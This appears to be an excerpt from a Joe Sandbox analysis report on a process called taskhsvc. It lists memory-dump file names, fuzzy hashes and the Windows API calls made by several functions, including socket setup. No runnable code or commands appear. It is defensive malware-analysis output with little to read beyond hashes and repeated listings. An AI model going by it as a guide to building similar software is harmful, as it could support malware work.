Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$closesocketstrerror
String ID:
API String ID: 3407496136-0
Opcode ID: 349e9a75bd5a8a575f0e4f41c34ccd778a3753c61e3c73aa9e81f490027bd119
Instruction ID: 0854648f8a21decbf30f04a301fb5c3cdaa6a832f705d9139919cb6b03363a6f
Opcode Fuzzy Hash: 349e9a75bd5a8a575f0e4f41c34ccd778a3753c61e3c73aa9e81f490027bd119
Instruction Fuzzy Hash: 8101D7B0A0434ACFCB00EFA9C94966EBBF0BB44314F118918E4A4A7385D3749945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5AA7 Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

rename.MSVCRT ref: 00EE5B14
__stack_chk_fail.LIBSSP-0 ref: 00EE5B24

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$rename
String ID:
API String ID: 3041394036-0
Opcode ID: 763df0463ec68b681031a470cd852f63254dc160d2d0e57a655fb8681c540ff3
Instruction ID: bef587a2567c3fa5d9d821d0032dcee18769cec948d25bb66ddea301ef91ee41
Opcode Fuzzy Hash: 763df0463ec68b681031a470cd852f63254dc160d2d0e57a655fb8681c540ff3
Instruction Fuzzy Hash: C101C4B49083099FCB00DFA9C945A9EBBF0FB48304F448819E898E7340D338E945DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3EBE Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DB3F1C

Part of subcall function 00DB3D7A: __stack_chk_fail.LIBSSP-0 ref: 00DB3DE6

free.MSVCRT ref: 00DB3F02

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$free
String ID:
API String ID: 2817809126-0
Opcode ID: c7427bc3ba212832e3fdfe9f3aee0269b8d2809e1d1ad01e27b3cc01ceb95c31
Instruction ID: 1fa5a6b87a3102e30479ce9b9156f8f145c0b73174ba2613c47b2cb721090205
Opcode Fuzzy Hash: c7427bc3ba212832e3fdfe9f3aee0269b8d2809e1d1ad01e27b3cc01ceb95c31
Instruction Fuzzy Hash: 22F0E774D0460ADBCB00EFA9C4457AEB7F0AF09304F458815A851A7341E738AA46EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EE9204 Relevance: 3.0, APIs: 2, Instructions: 31networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00EE922D
__stack_chk_fail.LIBSSP-0 ref: 00EE9286

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$Startup
String ID:
API String ID: 3981666929-0
Opcode ID: 3f4d2e05541e9ec6283e87bd4f4f04428a705d1007d99d0d11733bc0f434ff7f
Instruction ID: aa9e949e77c9403f8d71db7ed8a0655c00395df97ec993d1e442b605539b59ae
Opcode Fuzzy Hash: 3f4d2e05541e9ec6283e87bd4f4f04428a705d1007d99d0d11733bc0f434ff7f
Instruction Fuzzy Hash: A6016970A04209DFDB10EF79C84478EBBF0BB49308F008A58E598AB294D3789944CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00DBAEF9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00DBAF40
__stack_chk_fail.LIBSSP-0 ref: 00DBAF60

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failsetsockopt
String ID:
API String ID: 2656814134-0
Opcode ID: 65b9d0dcbf04c487226780fc49456d373e2900e91aa382921ae13605dbaad8d3
Instruction ID: 81e1259c0000b0f7f90004758b14e28d4139b774e14a9480572e75762e3955a4
Opcode Fuzzy Hash: 65b9d0dcbf04c487226780fc49456d373e2900e91aa382921ae13605dbaad8d3
